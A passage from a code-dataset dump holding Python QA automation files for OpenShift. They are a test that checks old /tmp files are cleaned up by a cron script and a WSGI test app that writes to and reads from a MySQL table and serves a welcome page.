OpenShiftTestSuite(conf)\n suite.add_test(CreateTwoSameApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6407837271690369, "alphanum_fraction": 0.6534833312034607, "avg_line_length": 33.873416900634766, "blob_id": "9d1a047f3db34b2c7e7e1d836af9d6da63079f6d", "content_id": "fa785a95c75d516b26142a83d14e31df1ef759c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 130, "num_lines": 79, "path": "/automation/open/testmodules/RT/security/delete_old_files_from_tmp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Delete old files from tmp automatically\nhttps://tcms.engineering.redhat.com/case/122329/?from_plan=4962\n\"\"\"\n\nimport os, sys\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[Security] Delete old files from tmp automatically\",\n libra_server = common.get_instance_ip()\n self.app_type = \"php-5.3\"\n self.app_name = \"SecurityTestApp\"\n self.steps_list = []\n tcms_testcase_id=122329\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass DeleteOldFilesFromTmpDevenv(OpenShiftTest):\n def test_method(self):\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0,\"App should be created successfully\")\n\n source_file = \"%s/data/delete_old_files_from_tmp_devenv.php\" %(WORK_DIR)\n target_file = \"%s/php/index.php\" %(self.app_name)\n self.info(\"Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s\" %(source_file, target_file))\n self.assert_equal(ret,0, \"Copy must be done\")\n\n self.info(\"Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name))\n \n self.assert_equal(ret, 0, \"File and directories are added to your git repo successfully\")\n \n self.info(\"Get app url\")\n app_url= OSConf.get_app_url(self.app_name)\n\n self.info(\"Access app's URL to create files in tmp directory\")\n ret = common.grep_web_page(\"%s/index.php?action=create\"%app_url, \"RESULT=0\")\n self.assert_equal(ret, 0, \"RESULT=0 should be seen in output\")\n\n self.info(\"Log into express server, run /etc/cron.daily/openshift_tmpwatch.sh\")\n (ret, output) = common.run_remote_cmd_as_root(\"/bin/sh /etc/cron.daily/openshift_tmpwatch.sh\")\n\n self.info(\"Access app's URL to check files in tmp directory\")\n ret = common.grep_web_page(app_url, [\"RESULT=1\", \"No such file or directory\"])\n self.assert_equal(ret, 0, \"RESULT=1 should be seen in output\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeleteOldFilesFromTmpDevenv)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5990639328956604, "alphanum_fraction": 0.6222915649414062, "avg_line_length": 27.141464233398438, "blob_id": "8fd696a70984efcbe96b753af454ba509a79fe3a", "content_id": "ddc6c359a28746447531307c0a20a1b484d182ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5769, "license_type": "no_license", "max_line_length": 185, "num_lines": 205, "path": "/automation/open/prepare_testing_data/data/application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n\ndef create_data(speaker_val, title_val):\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_DB_HOST'],user=os.environ['OPENSHIFT_DB_USERNAME'],passwd=os.environ['OPENSHIFT_DB_PASSWORD'],db=os.environ['OPENSHIFT_APP_NAME'])\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('%s', '%s')\" %(speaker_val, title_val))\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\ndef show_data():\n content=\"Welcome~\\n\"\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_DB_HOST'],user=os.environ['OPENSHIFT_DB_USERNAME'],passwd=os.environ['OPENSHIFT_DB_PASSWORD'],db=os.environ['OPENSHIFT_APP_NAME'])\n cursor = con.cursor()\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\n\ndef application(environ, start_response):\n\tctype = 'text/plain'\n\n target_file = \"%swsgi_data_test\" %(os.environ['OPENSHIFT_DATA_DIR'])\n\n\tif environ['PATH_INFO'] == '/health':\n\t\tresponse_body = \"1\"\n\telif environ['PATH_INFO'] == '/env':\n\t\tresponse_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n\t\tresponse_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/create':\n response_body = create_data(\"speaker1\",\"title1\")\n elif environ['PATH_INFO'] == '/modify':\n response_body = create_data(\"speaker2\",\"title2\")\n elif environ['PATH_INFO'] == '/show':\n response_body = show_data()\n\telse:\n\t\tctype = 'text/html'\n\t\tresponse_body = '''<!doctype html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">\n <title>Welcome to OpenShift</title>\n <style>\n html { background: black; }\n body {\n background: #333;\n background: -webkit-linear-gradient(top, black, #666);\n background: -o-linear-gradient(top, black, #666);\n background: -moz-linear-gradient(top, black, #666);\n background: linear-gradient(top, black, #666);\n color: white;\n font-family: 'Liberation Sans', Verdana, Arial, Sans-serif;\n width: 40em;\n margin: 0 auto;\n padding: 3em;\n }\n a {\n color: #bfdce8;\n }\n \n h1 {\n text-transform: uppercase;\n -moz-text-shadow: 2px 2px 2px black;\n -webkit-text-shadow: 2px 2px 2px black;\n text-shadow: 2px 2px 2px black;\n background: #c00;\n width: 22.5em;\n margin: .5em -2em;\n padding: .3em 0 .3em 1.5em;\n position: relative;\n }\n h1:before {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-left-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n left: 0;\n z-index: -1000;\n }\n h1:after {\n content: '';\n width: 0;\n height: 0;\n border: .5em solid #900;\n border-right-color: transparent;\n border-bottom-color: transparent;\n position: absolute;\n bottom: -1em;\n right: 0;\n z-index: -1000;\n }\n h2 { \n text-transform: uppercase; \n margin: 2em 0 .5em;\n }\n \n pre {\n background: black;\n padding: 1em 0 0;\n -webkit-border-radius: 1em;\n -moz-border-radius: 1em;\n border-radius: 1em;\n color: #9cf;\n }\n \n ul { margin: 0; padding: 0; }\n li {\n list-style-type: none;\n padding: .5em 0;\n }\n </style>\n</head>\n<body>\n <img\n alt=\"OpenShift logo\"\n src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAZAAAABKCAYAAACVbQIxAAAABHNCSVQICAgIfAhkiAAAAAlwSFlz\nAAAWcQAAFnEBAJr2QQAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAACAASURB\nVHic7Z15nBxVtce/p7pnsj4IZOkJyQwhPSQhQCQJSIILnbCjsigh74kooIAgKoqiggooCj71RXyK\nCrI8FQUSEAIYiEmmQYQgJGFLIMlUMllnKgEC2WZ6uuue90dVJT09PTO9BYip7+dTn5m6deucW9XV\n53fXalFVQt47/tHYMvgj9TWb3+tyhISEhBSL9V4X4N+BpO1cW+q5RjiikmUJCQkJebfYJwXkqVXO\nkU+uajmmgiavTTa2nFPaqRIKSEhIyF7JXiEgDas2feqplc2HVcqeqg5XlWcbVjk/nrlsWXUFTFpq\nyd3zV28aV3RZYNSiRVRVoAz5kD1kNyQkJGTvEBDUnGksa2mD3TJnQeOmk8s1ZwQBIijfGdRr4KIG\nu3li+WWkn2X04eSK5kFFnlm1bYAzumz/OTSsdI5taHTOqLTdBaubD660zZCQkL2TvUJARMUCeRtk\nrKBPNDQ6ry5odL6QbGrqXapJABW5DKQKtRYusJ0fltUaUe5BGaSWNTOZJFrMqS6VHQeZt6q5Tiwe\nFqFPpWzOf33DwKTt/K9lIk9XymZAsqmpd0Njy7mldwOGhIS8F+wVAoIQEVj9Rjw2EnS6wFbgdpPp\ns/bvK1pumL96U6w4c+ILCM/07tU+HvSXKNcMrBr4/LzGzeNLKaJavKoinwWON8OdGUWVx1ROQJLL\nNvePqPWIQlH3pCsWLaJqwSrnSquqaiVwBWjFutsa7E0farCd23D7tIjIfWAdXSnbISEhe569QkAE\nLEXNNHCn1Nfcn6iPHSfKJIEFiFyTSZu1f1vRctejSzd9oBi7Vao6efjw1in1NVcZyzoeoS9q/vX4\nipbrSxmXmBof8ldBbgCumN/ofL6ICzy8WF/5uAEsU23+AhQ9FpOP5Ern41sHtLwqygzQAyox4fup\n5c4hycZN1zXYTiPo08DFCvtXwHQHkk2ba5KNmz7zpN3yf082Ol+rtP2QkBCK62p5r1ARS4ya7LQp\nh8aeA/5zrr2xFmNdgZFLjGUumLVs44KUicw474jYY0DemCcGUQGju4+fOHLw0482N3+g13brJoHv\nO/2dM/+6VC44+/AhLxVT1kT9kB8ssFvGqZFb576+6bWTxwx5poDTKtIC+Wij8zPg4yhlDZ/PW+Uc\nGVH+B+FEVDrYKkVE5jS+tV8v0udaIp/VCB8Gldwylllk5r7s9Iv204+KyEkoJwFHiIAigDSXYTok\nJKQL9goBETWWiph8x06OH7QO+Nbcl50fpKu4AOSrouaRO1/cuKLN5ZbNyN3XTRy6M/scg9eHpTmr\nKD8+dOhO4KtzGlsexNU7LUufn7ms5cbBm2p+nEiQKbC4aqUinzPV5hm1zANzGjccc1r9sPU9nDNy\n5vr1faYNH95aoI9ONNibLgF217RLiMj/aGwZnBH5oaV8QSGy6/QSbM2EyEC75WSMfLaXcCbQx6h2\nNJNjN+8H3I39QSudoxVOEuHEqr5MRqU622a5opTL3JedflX95CgLnaDIRNAJKLck6mN3VNBNSMhe\nwx4TkPmr3hgV1cxNiixW0SViRRYnRgxuKcWWIhHA7S7PyeNiO4BfA7fe86rzMdT9msKve6fNjd9/\nev3vNrfzq99MHb7Bzy4AEdW8Meu0+pon577sjEtX6X+L6vUbBjafedsi94JLJg5/pZDyJsYO3j53\nuXMmwvPGjfz17qamj1wwYkRbN6dYVdsjY4FFhdjPpWGVc4Iqv4bSAubMZcuqD6g68Ksicq3o7u6k\nDgG4wGj8+PJN40TMZ/dHzjMiNdKxAdPZTBFR/gl7c31E9SRRPWmgMEWFAT3ZLFVE5q3asn/UpMYr\n1gTQCcDEqn6MArUMIEFbzJI9NQU7JOR9zx4TkIirfdWSTyp8EhU0Y5hvO83AYmN0saouzrgsOf2w\noWt6NCZYaP4WSB70vCNijwKP/mbx+nEgX1PlaxE1V503Z83MzTvdGdcc1V9AMVVd98j4gvSlWcs2\nPIhad1iW9cIvX9jwgy3bh/3kugJaIyePjq2eu9w5F/SJ/Xf2uh04v9tCqxxOCQLSsHzjaBOJzBL/\nsyw2YD6+ovns/aMH/lSReHBylwG/C+OzX90Uk4j76YhlfVbQo4LMitCjzW7sPrqieZClMtVCT0Lk\nJAsOVtmdsVCbPT0481/fMJBI1XgRMxFkAjDBgrhBRLIfkT3YugkJ2RvZ811YyllimQ0Ga7ygE1AZ\nD/INhT5Y8NBrLW+2u7qk1ZXFba5ZvDVtFl997PBGze5uVyzI31rojssmDH8ZuPDa+au/LRq5DLhM\nRT59j9322nnxXrSme44B54wdNv/O5W8cSWvqZyA3Rqs3nvXthswFN0+pW9rTuSePji3423LnKkVv\n+fOrLS99+oian3WZWU3R4yBPLFt/oFVV9agoA7KDdCHBbfayjeOjEWuGiByvAKpex14hIuIz69Xm\nT2JxUcTilAgSNapYsvsEb78IEfGZ+YpzZDRi7o6IjEe8SXOiYASsQsvZxY2Y/eqmmFSbCZbqBEut\niWLpBLEiB1soot78vEJthiISsq+zxwVExEolRsZeAF4I0mZCZL/GljEYnaBY47F0gmX0UoX9BeH7\nT6/f9uWUefHNlFncslMXX3Vk3/37RUmXWoYfnXCIA1x/+pzGm1DrPAPXAzy4OlN32qG81tP5F40e\ntA249H8XNT8A5vfGkkUXz117/Tvv1P30/mndd62dPjr2y78ua/kAqjffvrj5lYsnDH0iXz5T5CtN\nFi2iSvtHHzSq9fmCdFfBbeayzTVR3B9FxLrAKJaFH5ihcBHxSSu3Rg0xIx1zlCwiAREzzCgT8tks\nSUSCa39140kRS+ZGXAERRLR0sSuwdRMS8u/MezKIPg1c6muWAkuBP/rJctuidSMFazyqEwQdr8h/\nIfrVNdszVIm8kSjT799Oq08Bd/742Q2jgasjVnGtmi9PHDr3J4tWHUm66n8Ubmrv3XT25PvkgpuO\n7n49Y4a3LoMDD0PMvT99bv0Hv3ns8JW5eYTipvI29235bQSOh66DX7ay3d3U1Lt6a6+vV1l8xwj9\nd3nFE49SRCTjB+donhzliEgmA1Grc46SRSSwa0lEtGOOSDktprD5EbKP836ahaWXTKy1ARuYFSSe\nPHvdQb0sed2lgu+dV/XDk1V0BfJbE0e+A3z+4r+veQDldsRdYpSI6WZNzbSxY9tnLtv8STLmhYjI\nw9/65xvH/uRDg7ZlZdkG1N3wXON+1x1bv7WnMvz1tZZvRuAiFCLQY/C7bdH6Y6OR6vtci4NFuwj4\nFC4iARmjflSvrIi4fmJ3NksRETeD1+TKyRGKSEhIabzvFxLOPaN2Y0TEVaViAhLEBTWl90DcftLB\nfxPD4YrcZ5ToP1rSx3WXf9rYwS2IdTZwSC+39Z4OsUlkI/BOqq1Pj62Q+17ZeKZr9GZXFaPgqhfv\nFS/4Kbv3A9ISmZxRDk4bJaNey8H4W2DH+HYM+Dby28omo56IdGuTnssHHfdTGQqyaXooZ+5+BsgY\n755l23RLLCfQw9zAkJB/b973AgKAIKbwWVg9YsRrgRgpfmA+m7+eNeLthece8jkAoz235i4+quZ5\nVS5B5BOXzF3zw45HZVnE0m7HQf7w0sbxGZV7jGK5uQEwT/ALSKUNaeMF5EJFpKfgDOyyWSkRCchQ\nQDkpXkTcQJgqLSIhIfsoe4WACFgqlevC8l7OCBFj3vVYcNWxw/4oIj8XkWvPnL162q4DqktNN680\nuW3RmqEpw+y0ar+0YVfQ605EgtpxykDK1aJEROk5OLcbJbMHRMSlwHJSmIgEZICMaigiISEV4v00\nBtIllqigUrnvrPc6d6RK35MOiNeah33rwAFrj1Tk7rdT5m/79YqAxVJRPp4v/4xn1/fRSNXs3jAc\nAEvBCFX5+vNhV19+sO47A3jtNz+fhRc5uxu/COzQeawhoL1YmwWONaRcF7Wsomz2NCbi2fUDvxUU\ngqwqVNY9LGJMJCRkX2avaIGAiHaxarwka3gtkHQm8p4IyP3TcFNVZjqwYeVW9xRXNSLoUqTzVF4B\necflDymjR7f5rYi0gbR6/3fbEvFttGa81kJ7hVoiAe3G21IVbomk/PIWXE4Ka4mkMi7tJuh6q0xL\nJCRkX2avEBALpKt3YZWC+i2QqFXBmV1FcldixNvGlTNdpdeWlNZkImYZqrH9blvR4QepvjR/3Y2t\nrp6TcpWUgWJEJKA17dJWQREJSLlZNisoIqks25UUkRTQ7mooIiEhFWKvEBAEoYKzsCCYxmve0zk0\nj5598Gv7VUuTq1RPGzV8A/B22rV2jYOc+8ja81szes3ODLRmlGJFJCBloNXVionILrsZU1ERCT7h\nNt9mpUUk5XplDEUkJKQy7B1jIICpYBdWMDhgTPT9tpB4mWKOAJ4E2O6ar5MOet2Djvns//1jXYyJ\nuL48bk9nB36BqHa0UcSYSLbitrr4up5dniJs5ow1+L/zRSqD18lYSjnzjIkEo2epTJAr+z5SsTGR\nkJB9jb1CQPwWSMWCveWPgahr3mcCIssFhgR7W9OaE5+KFBE/IO/IGESsjueWKCJZ7zKkze1CPPAH\n8IsVEf8j3uni98GVWM4cETHBfXDBU5Pc++jfP8haTdnRZlciEgpIyL7MXiEgAmI6vBa1PIJV49Fe\n76+eCBXTvrt7Dd5pz1e8IkREvPZCaxqEPIGz1ODssyOTrxylB/xAnFIZkEgFyumLSMQXplQm0Iau\nRITdJxUoIuE6wpB9mb1GQCrZAgG/Zi/vzSys7pFdoevt9g59Ktl5KEhE/Du21YB2Cvb+/8UG56xP\nYecumznl0NICftAe3OFm/LfNdC6namkiArDTzfgtsVyhg3JEJCRkX2XvEBARgcoJiPgr0dWt4LhK\nCZzxaHPfE2L0DfZFZT+ULcH+Wymzw/uvNBGJRrzdHSmDVEvX55ZQw4fsFkiO3WhpLZHgJxB3pECr\nKtdi2iVMGch/z8oQkbANErIPs3cICN7XuWIGg+7uyHszBvK9Z9bFN+8wl2P0wh2Z6AFRYdsDrzSP\nAc7BMicH+XamrakiZjroFRA5prOl7kXE78Hi7TR51mGWE5w9tqe76WIrQUSCEZ+tGTCSe12llDNH\nmFzo+CvG5YtI2AAJ2ZfZOwREtKILCf1+DKre3RaI/G5x8yk7M+YKceU0kHZE/zJ2QGS//aqtI95O\nub8AZrV+cUwyOEG/XJ8C/gD8ofaulcdC5ArgXKA6yyxdiojfAtmaMbvTOhaJYoNzdvjdlldAsuwW\nKSKW39e0M+MiHVpd5YnILmFqc9Hq3NZceSLivs+mYYSEvJvsFQLid+eX3VcwJUk0smXVyA8OqhoG\n4JpMSTa/vmD9sHfS7qQ325jkpNxJPxzfr8u881Zt2X9rqu3CNpfLLdFDFdaocE3Uivx+9ifq3kza\nzm+Nahw4qMrSMV3ZWXfhoc8Bz33gj/ZVItYlKF8EhnlHuxER4J12XYuyETios+VSgzNs7VJAsuwW\nIyJ+kd9J+dN6K1LO3cK01QW6azWV2hIJCdlH2SsExOsoKPxdWPcuWXfQdpFRKRMZtb3djN6e1lFb\n2t1RB7UzcpNK9M1Wz5T0jfYoIHc3NfWObq+e0JrWSW2uNWlbu5kcjehwyQiI2QLynCVkxh4QeTH7\nvLm2cwQZrkijn0Hph8p8Fa6uXXPQI1/v/CuGUUF+cN2Hajf2VJ6Xzo9vAm6ckkzerFsOPhuNXAH6\n0Xwion7VO3P5oQ8CDw68y66VtJmsYk0GJgETgOpig3NAPgHpmFKciATvGtiaytfl5tsrZT1L0AJJ\nAZ2EKaesRYpI2IUVsi/zngvInMbGXtvbe9e2ZarqdmQydTvSUrc1bereSpm6N1Na19Jqaq84rE8k\ndwxkTuNb+/WxUqPaTWS0GjPKGEallVHtqqNMNNrf8t7n4QJNAq8DjyKyHCMrjq+pOg740Xl18k5u\neeYudw4xFpOMMZPaVSb3d3sdlVKqBFwVfRXlMZSFatxnHz7jkBUKmrSdtlgf6+1kkqgO23QmoldY\nSsIV3Y7yfy7y608fWbMMgKPy3oZlm1trbinmvjUkEhlgJjDznNmrx3ndW3IeqD8oL50k980L4+uA\ndcD9AKfPaey1o61qAphJgjUZdDIwvFAReact8xGRqsNUzWiwRgmMxtuG7PZauIgEwXiLq0bbu7ry\n4sQuQpYwZfB+xrZLihcRCcfQQ/Zh9ryAiA5Mrmo+Wt1InYrWAXUZ1TpV6lyoa3f7D1FV8WbpCoq2\n4gW5NQpPo6zpX8XXxh0YiSywndstZLSqjuoFMWMsRBUVtqjFclxeUZipwnJRa/kbfd5qvG7i2E6h\n6EnbOVSBTHukX7Kx5QMGmQRMBiZZFkP8qaKbxbAQ4TqxZGF7r+jzXxk7eHu2nTs6XCZn6vBNXwId\nrugKQb5qrOq7P1Z/YA+/MKiqwhWXTCz9N99nnXHIy8Allz+29lutveUiRS8HRmq0++qx/xO/z/rb\nDIDLFqwfhjGTcSOTQSeBTATt1SE4ByX/ymErgU4/zzvloaYBktbRiowCM1qJjBZ0NFGpB+3TVcAP\nAn368vq58r+N+xu0VpRaVGpVtQ6oBW8fdDjQpyCxCwbRW9tfUqq+BNQoGgOtASsG1AAxoHexIuKG\nLZCQfZg9LiCq+if/dYhB0mbBWgu6VpR/CmatKmvEYm1arDXfOLZmc66NpO1cBhyuaB+U5aL6RxVZ\nbizr9Yxxl59W3/kcj5q8qQYRQVGJrgEs8V639JLA/SKyMIo8e8qoIauKvNQPIjoHlS9MrY/NJbc3\npwtUufeE+poni/SVl1s/VrcF+PkNNzBjx/FrTzdqmou18Zupwzfg/aTwLIAbli2r1q37jVfVSRKx\nJktEDunJRsNZI94GnvO3XQjItc801+FmRot6FQGwRmMxGqO1mtUfpF+u3wos9be8XJpsHiS015Kx\naqnSWkykFqgVqMWiFsMwLKoCYdIrD2sGbu3K3rnzVu1v0lKjEo2pmBpVK0bE1AhSAxFPcCxiQAxD\nVcfHOiRk30O0yz7h8liw4s1hViTzRZQ1BlkrbmZN735m7eThw1uLtTV/5aaRA7YOWTexjFp6Nk82\ntkxTmG7EWmiJLOxVnVpUSrkCko3OTa7K7SccWrTohPjMeHZ9n37VkX6XTBz6RqVs3gBW7ZJ1NdWm\nj35m4qCixbQb5A//2nBgpCoSq+4VeWva2MEtFbQdErLXsMcEJCQkJCTk35u943XuISEhISHvO0IB\nCQkJCQkpiVBAQkJCQkJKIhSQkJCQkJCSCAUkJCQkJKQkQgEJCQkJCSmJUEBCQkJCQkoiFJCQkJCQ\nkJIIBSQkJCQkpCRCAQkJCQkJKYlQQEJCQkJCSiIUkJCQkJCQkggFJCQkJCSkJEIBCQkJCQkpiVBA\nQkJCQkJKIhSQkJCQkJCSCAUkJCQkJKQkQgEJCQkJCSmJUEBCQkJCQkoimr2TtJ0PAacBxwIR4Hlg\nXiIe+3slnT7Z2DJNxfpYbrqgKYPaIrogMXLoCxXzZzu3KLJ/d3mMur+cWj90cTl+Fi2iatuATbcD\noPrbRH1sYW6eZFPzGNzIt1FtTtTHvlOOv2yeXb++T6q96lIxHKPCSEAVmixY7cL8qfHYgkr4Sa7a\n/GFUvxDsi/Dc8SOH/KZDHrvlZ2ANCvYjUes7Hzl4UHM5fvM8Mw8l4kMeKsfmvFXNdVGN/KDgE1z3\nG4lRQ98oxVeHZ6MAVM3OKfU1l5fiKyTk3SIK0GA7AlwD/ICOrZIpwNUNtvML4BtT4jG3Ek5drImC\nfi43XQEQVEUbbOe2KfHYFyvhz8B00Fh3eSyJPASUJSDbBjZF1O3jXZdwzKJFHDVxIukOmTJSo6Kf\nQ2Q5UBEBmb+6+SOWqboPGKrS4dBkAwhc02C3PC0q38wnakWhbr0iuz47VXoDHQREkXNADw72XU3f\nDJQlILnPjKo2AWUJSNSNHqiW6fQcdoVUy/VASQLS4dkoyJm8A4QCEvK+JmiBXOdv4H0pHwfSwPHA\n+cCVQF/g0ko6F+XviP452DciA0SZDkwCLk3am5Yk4kN+VzmH8mtFG/MdUsMrFfPjMXbbAOdqiP2o\nwnY7sGDFm8OsiPUAMLj7nPIhLCvafZ6QkJCQwokuaGwZBFzl7399an3NjKzjdy5obJkNzAQ+v6Cx\nZcbU+prXy3drUAUVXTY1PvTunIO/aGh0/qToear6eaBsAVH12jZGddaJ9TXJcu0V4gtA4bsLGjfd\nO7V+iB2kZQBLFUTznV40IplPqWq2eKwXZb4RHSDIEUDcL8tdJ8QHP12uP2PoUHbJkyf7HgBIe7le\nIXhmKks7qpHshHeAF7vKLUTaSvW0eedOM7C610u7ElQEYVxWFgO6qxIjKttK9RUS8m4RVfgy0B94\n+YSO4gHA1PqaB+Y3tjwCnIHX5VJ4M7wLeowDlv5ZDechHI4Xo8oKHRWPOwX4Erhf4VxwfwOcvKfK\nY0QndkgQfjG1vubnwe4C25lqjF4lrnt1pXxqF/93lVYJ/ci1WYl7mKZjf63Ai1PraxIVMN2JaWPH\ntgNHBfvJpqbebqZ3a1aWbSfUDz2q85n/viRtp28iHtv5XpejO5K20wvIJCrUfd+Nnw734qnGzeNd\nTK2KvKHp9PITxgx7s0h7/RLx2I7Kl7Sjj6hCEIDu6iqjesfOYHfeslHy114BjDLYDxA7qECs0F1/\ntTrZ1NQ7SH9yxIj268CUaz+fL9eVb0ciepIiJ81b6Xz6xENjf87NUxF/gpMT0W+a19hyIjA7ivvI\n1PphC4CKDKADuHT63EbNa2y+MjtBkP32hGjvaZsKB863m0/tcFx6P3viyAPe2QOu37WKTdJ2ZuCN\nZwY0AQ8AsxPxWEWuLWk744ELgGCiwwvAdYl4bHkX+a8E9gduqJD/XwMfykraBMwGHkjEY+WMv70O\njAfezuNzCvDFRDw2PSd9BHBfIh47thAHSdvpC6wEhoFXuVDtU20Jh7vKokh11XhgXs455wEXA2OA\nl4BbE/HYw/6xwXj3/2D2EEnb2R943TLGjDLGYIyxu8psjLH9PPG5KzaWPfXXKBhVMnlC9/zVm2Ku\n0YuMKkZ1Sbm+PH+KUUWVJ9rTvVqDbfKKjedWwn4+X26k6k1j9GqjisH8z2Nr1x4AXheWUcWYyoQP\n49LgfzbBVmWMOdUYc2u7kXVzV258Ye6KjdN7tlSET/8a/W28UWZkb67qAdl5KuMzx6+pjO7nXMuR\nrmFO9oZpP6wijnr2vafcABwC/BP4or/Nwgv2DUnbKXtcLGk7A/EqKW/gCch0wAG+0s1pI+i6DlkK\nceAJdl/jr/DGUp9P2s4BZdgd0c2x/YHRedJ7Ax8owkc1cFB2gghiRN6MRFBjOi63SNrOtcAPgZ/i\nXeP/AXcmbecMP0s/oNtJQxWgD1ATdVWH+wmbusrpqgbHegODustbCBlj8Otfn3h8+foRQboiA4AP\n400hzoiY75bjJ8BVk7e6J1LJ59f35Qe2qqq35cT6kXfMWb7hM8DxVlvkZuBSzWTUraDfk0fVzHl8\nxYabVPkmOdOyAVAmAvfOeX3j9NPGHPQpyqz4uq6LFln8iJS/3CjrmQE6j7OUQhqQHoTIrZBQvdu2\n87AuEd81A29h0nb+hjczbjzedH2StjMabwr/K4l4rEPlLenN1DwMOBpYkojHsiedTAB2JOKxH2al\nLSqkUEnbiQFT8cafHk/EYyZpO/sBH0zEY7m17gTwYiIe69Qa8FmddY0kbecxYK1v/wE/rY+/PwB4\nMhGPrc/xcQBwil+e+YVcQyEkbSeCd6/HAv9IxGOr/XQLOMH//1QglYiPaGhY6aiKNoJEMqIvZtmp\nBb4HjE/EY6/5yU1J23nGv9buynAc3me4PBGPPZ2VXg0cn71cI2k7NUBdIh77V1baYLzueAd4DcAy\nquv9GtCQrhwb1SF+njajWtI0xmwyGFxVXNWRGeXMYHNVj3dVI67qStfomaeOqn2+XF8ArgFXlYzy\niVRr+oBgG7yt+YFK2O/gy7sutm+1BNA0cqmrmnKNXvzY6xuPU1UN8lSKU0cNu8YymTqjXGtUV+fW\nbP1W0NmPvbbusnJ9pXd/dgVvlRgDyeT4rUjoTdNj2TOV8NMFub7eZbYAm4GBAEnbmYnXVT0OuMMX\nmGwexpvQMg74U9J2sr87C4EBWTXgQjkReBBIAH8B7vfTU8DMpO2MDTL6gXM25EyL7wZ/3GIrsNO3\nMRB4FvgucA6wNGk7H8nycQhed9CleC20x/1DZX04vki8CNyINw62IGk7wazXCPAp////BM4CmHJo\n7Lmp8diC4w8Z8veT47HsCvv5wPos8QiutSkRj+X9WiRtR5K2cw/eDNvjgIeTtjPLrxQAHAg8knNa\nAvjvLBtjgVeATwNfAu4FiKaNWQEcitfMzUvamOCYfdbYurK/uxljvIk8wqMgdwTpYmhVpfGlI2pX\nV3JsImP88S9jtp911Iis2suISrkAvI7lATm1yjNGH7T8oaVrfoTID1Tc3yCRr/RU6y2FUw47uBn4\nMXDTQ8vWThU4R2EafoAAQOQE4NZy/LgGcj6a+84aW/ef2QkPLVvbRFb/q5suPwzvemYqSDtpMLtb\nRwL/1Hbz8ew86aNG7JHZUE10flbeZc7AezaCtU/nJuIxhV21dCdpO3WJeCyo1Z6Zdfw/gOak7dQk\n4rGWRDy2LWk7X8ETnleB7ybisX8WUIY3gE8l4jE3aTvfBdYnbeeYRDz2fNJ2ZgHnAtf7eacBDxY6\nMOwLzjS86e1Bzfq7wPOJeOxiP885wBXAP/zj1wF/ScRj3/KPfwh4mu672oYkbefbOWkdptT7rapx\nWffvbuDxpO38KBGPpZO2cznwX4l47IICLm0MXlddMZyP16V2cCIea/U/qyXAecCfCrTxY+CWRDx2\nk38NZwMfjqaNWYTXb3kh8Mt8Z6aNudD/t6BmaU+kjdelpGBPP2JEp8Vg7ZsavAAAB9RJREFUZ1XC\nSRbt/hf13fi6Br6qs9I2tb1x8wHVA6erMA4yFVkcmc2spU1XYxirEffGaWPjjWeNrZsPzL//laYn\nRPhrVtYDy/WVzunCyhfTU8Z0+MZF8uQp2q/J3w1Zlk1AOwbxzLkdKhh7lvYCBSTZ6MxQv4InlvUz\nNeaip+pjXxi7bFl0YK9Bv5saH3JhTzaA85O2M8n//wigFbgg4dduE/GYJm3nULwujhfwuijG43eL\n+MfHAKOAfwE2XlBq8Y/f6Qf9bwBzkrbzd+C